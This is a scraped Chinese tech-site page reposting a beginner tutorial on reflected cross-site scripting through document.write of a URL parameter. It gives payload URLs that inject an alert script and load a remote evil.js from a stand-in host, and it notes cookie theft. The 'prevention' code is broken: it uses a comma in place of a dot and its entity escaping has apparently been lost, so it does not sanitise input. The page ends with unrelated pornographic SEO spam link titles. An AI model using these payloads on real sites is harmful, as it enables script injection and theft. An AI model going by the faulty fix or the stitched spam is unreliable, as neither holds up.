<span id="mktg5"></span>

<i id="mktg5"><meter id="mktg5"></meter></i>

        <label id="mktg5"><meter id="mktg5"></meter></label>
        最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
        問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
        當前位置: 首頁 - 科技 - 知識百科 - 正文

        js中xss跨站腳本攻擊的簡單理解

        來源:懂視網 責編:小采 時間:2020-11-27 19:32:54
        文檔

        js中xss跨站腳本攻擊的簡單理解

        js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回
        推薦度:
        導讀js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回

        <!doctype html>
        <html>
        <head>
         <title>這是標題</title>
         <meta charset="utf-8">
        </head>
        <body>
         <script>
         var name = decodeURIComponent(window.location.search.substring(1)); // 獲取參數
         console.log(name);
         document.write("hello " + name);
         </script>
        </body>
        </html>

        訪問

        http://abc.com:8887/?%20word
        本地使用web server for chrome 完成了本地靜態服務器的搭建,使用host文件,強制修改home.abc.com 以及 abc.com 到 127.0.0.1 完成域名的綁定,因為js腳本不能本地運行,因為有跨域的限制

        頁面輸出

         hello word

        這是一個灰常正經的頁面。
        下面如果嘗試輸入

        http://abc.com:8887/?%3Cscript%3Ealert("David")%3C/script

        事實上現在的瀏覽器很智能了。已經自動解析了。已經自動暫停解析了,最后加上%3e被瀏覽器攔截,自動的,去掉以后,由于容錯機制,自動生成
        好吧,要不是這容錯機制,xss還沒法實驗呢。無奈,現在太智能了,小白的手法,已經不行嘍

        <script>
        </script>

        導致能允許。好吧,去掉自動攔截,chrome直接禁止訪問了。╮(╯▽╰)╭
        使用的是預解析,自動平衡樹

        此時script變身成為

        document.write('hello ' + <script>alert("David")</script)

        好啦,接著,就會出現一個彈窗,David
        因為使用這個url自動生成一個另外一個腳本,由于瀏覽器自動的安全措施,所以使用瀏覽器頁面預解析,寫一個不平衡的樹,初始瀏覽器解析的時候自動添加上

        <script>
        </script>
        事實上,現在基本上都會屏蔽掉的,和sql注入一樣,都是非常小白的攻擊手法。╮(╯▽╰)╭

        導致出現彈窗,xss完成
        接著下面還有
        使用src引入一個腳本。

        http://abc.com:8887/?%3Cscript%20src=%E2%80%9Chttps://1.com/evil.js%E2%80%9D%3E%3C/script%3E

        這樣就完成了一次腳本的注入。會將其他站點的腳本,通過連接進行注入。
        可以對該站點的內容做任何的操作,以及讀取cookie,以及將數據發送回站點

        事實上瀏覽器插件就是這樣干的,在頁面中加入js腳本,通過更改頁面的js來達到對頁面修改的目的

        預防

        通過使用replace()全部替換為實體即可。

        name = name.replace(/</g, "<"),replace(/>/g, ">");

        總結

        xss和sql注入一樣,屬于小白攻擊法,要說簡單也很簡單,要說難也很難

        拒絕服務攻擊

        如果一個站點無限彈窗,瀏覽器會卡死。包括使用js挖礦什么的,都不值得一提了。

        相關文章:

        利用PHP編程防范XSS跨站腳本攻擊

        如何利用php防止XSS跨站腳本攻擊

        聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

        文檔

        js中xss跨站腳本攻擊的簡單理解

        js中xss跨站腳本攻擊的簡單理解:跨站腳本,稱為xss這個術語用來表示一類的安全問題,指攻擊者向目標web站點注入html標簽或者腳本。來一個小栗子 substring 返回介于兩者之間的字符串,如果省去最后一個參數,則直接以length為填充window.location.search 返回/后面內容包括問號返回
        推薦度:
        標簽: 里面的 簡單 js
        • 熱門焦點

        最新推薦

        猜你喜歡

        熱門推薦

        專題
        Top
        主站蜘蛛池模板: 亚洲av无码一区二区三区在线播放| 亚洲精品中文字幕无乱码| 精品久久亚洲一级α| 亚洲人成电影青青在线播放| 日本免费高清视频| 无码久久精品国产亚洲Av影片| 日本免费在线观看| 亚洲黄色三级网站| 精品福利一区二区三区免费视频| 亚洲日本在线观看网址| 2020久久精品国产免费| 伊人久久亚洲综合影院首页| 日本不卡在线观看免费v| 国产成人精品久久亚洲高清不卡| 国产一区二区三区免费视频| 亚洲AV无码久久精品成人| 日韩免费的视频在线观看香蕉| 亚洲高清日韩精品第一区| 色老头永久免费网站| 亚洲熟女精品中文字幕| 日本一区二区三区日本免费| 豆国产96在线|亚洲| 久久亚洲中文字幕精品一区| 亚洲AV成人无码网站| 亚洲人成网站观看在线播放| 国产成人免费ā片在线观看老同学 | a级片免费观看视频| 亚洲人成在线播放网站岛国| 美女裸身网站免费看免费网站 | 黄色一级毛片免费| 国产亚洲精品国产| 无码国产精品一区二区免费| 色婷婷六月亚洲综合香蕉| 亚洲综合熟女久久久30p| 亚洲电影免费观看| 国产成人综合久久精品亚洲| 国产国拍亚洲精品mv在线观看| 免费视频专区一国产盗摄| 色www免费视频| 亚洲伊人tv综合网色| 最新69国产成人精品免费视频动漫 |